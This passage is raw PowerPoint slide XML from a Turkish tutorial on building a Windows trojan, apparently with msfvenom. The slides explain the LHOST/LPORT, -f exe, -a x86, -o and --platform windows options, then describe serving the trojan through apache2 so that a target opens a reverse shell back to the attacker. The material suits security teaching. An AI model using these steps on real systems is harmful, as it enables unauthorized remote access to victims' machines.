                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>trojenDeneme.exe</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="2000" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>-- platform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> --platform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>windows</a:t>
            </a:r>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518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FD823E4D-6ECA-4DE6-2A3E-4D8A513EE622}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Dikdörtgen 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E05078B-AB86-528A-6454-B620E7B7EC2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5654040"/>
            <a:ext cx="3550920" cy="10820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A993D53D-D44E-C2AF-CD6D-5D76CCAED1B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4069080" y="5654040"/>
            <a:ext cx="6004560" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>home</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>/Desktop/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>içine </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>deneme.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> diye </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>trojen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> dosyamızı oluşturduk.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Dikdörtgen 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9ABC1F8F-01DD-CA50-ABD8-51681AC38FD7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3733800" y="335280"/>
            <a:ext cx="2026920" cy="3352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a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0236A4A3-D988-9EF8-1247-2E4C12C42CFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5760720" y="335280"/>
            <a:ext cx="1051560" cy="33528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CE823A44-BE3B-5699-6860-9FC7968AD170}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6812280" y="335280"/>
            <a:ext cx="2590800" cy="33528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E6CDDD10-5DBE-6286-4BBA-6F112A1AA81D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9403080" y="335280"/>
            <a:ext cx="1584960" cy="33528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72F64E7B-CC54-33BB-3BBA-D7ADB5977CD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1640205" y="1497985"/>
            <a:ext cx="2758440" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>LHOST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> için kendi IP’mizi yazıyoruz.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>LPORT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>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için açmak istediğimiz portu belirtiyoruz.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Metin kutusu 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56DA5009-5FDC-49E2-724E-593D265F14FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4511040" y="2467928"/>
            <a:ext cx="2286000" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>-f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>oluşturmak istediğin dosya türü=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>exe</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>-a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>işletim sistemimizin modeli= x86</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Metin kutusu 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99A6D4C7-CE66-E3E6-7A51-C206C1EC3FDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6812280" y="1590318"/>
            <a:ext cx="2499360" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>-o  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Trojenin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> oluşturmak istediğimiz konum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Metin kutusu 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20C6F19A-1A33-840B-8C29-93D8DF700FA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9528810" y="1590318"/>
            <a:ext cx="2484120" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>--platform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>hedef sistemin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>işetim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> sistemi =</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>windows</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Aşağı Ok 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F955F456-6A1B-FA56-8C21-2ACADAC7FA60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3783330" y="757506"/>
            <a:ext cx="346710" cy="8117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Aşağı Ok 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D23662AA-B61B-2C99-8543-7D5C1EEF698A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10454640" y="670560"/>
            <a:ext cx="316230" cy="827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Aşağı Ok 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CD40E3E-74DE-3852-A86E-6204476B8CF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7913370" y="654873"/>
            <a:ext cx="316230" cy="827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Aşağı Ok 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4300D5F7-38B4-9455-8790-F54A52E7ADC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5867400" y="716949"/>
            <a:ext cx="316230" cy="1630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Dikdörtgen 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F32C7C3C-2A43-5330-2367-1E7B3064707C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="335280"/>
            <a:ext cx="2727960" cy="31959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294B045E-E417-9B34-9C57-5FE0A1129D5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="83128" y="3194462"/>
            <a:ext cx="2933204" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Payload’ımızın</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF00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üzerinde çalışmasını istediğimiz için Windows için yazılmış kod parçasını seçiyoruz.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="531906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içeren bir resim&#10;&#10;Açıklama otomatik olarak oluşturuldu">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DA3089E-1DF6-2523-40F3-F6579DBF2814}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="393" r="19691" b="-1"/>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2541511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metin içeren bir resim&#10;&#10;Açıklama otomatik olarak oluşturuldu">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AF77A19-6255-6167-A158-39FF45D0D4A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-1"/>
            <a:ext cx="12192000" cy="3069315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Metin kutusu 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEAEF0DB-AA1B-1691-44F4-D5DB0E134B3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="167640" y="3185160"/>
            <a:ext cx="12024360" cy="2246769"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Hedef cihazın bize bağlantı kurmasını istediğimiz port için </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>apache2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> servisini başlatıyoruz. Bu sayede hedef cihaz bize </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>reverse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> Shell bağlantısını sağlamış olacak.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Evet servisimize de açtığımıza göre oluşturduğumuz </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>trojeni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> servisimizin içine yükleyelim. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
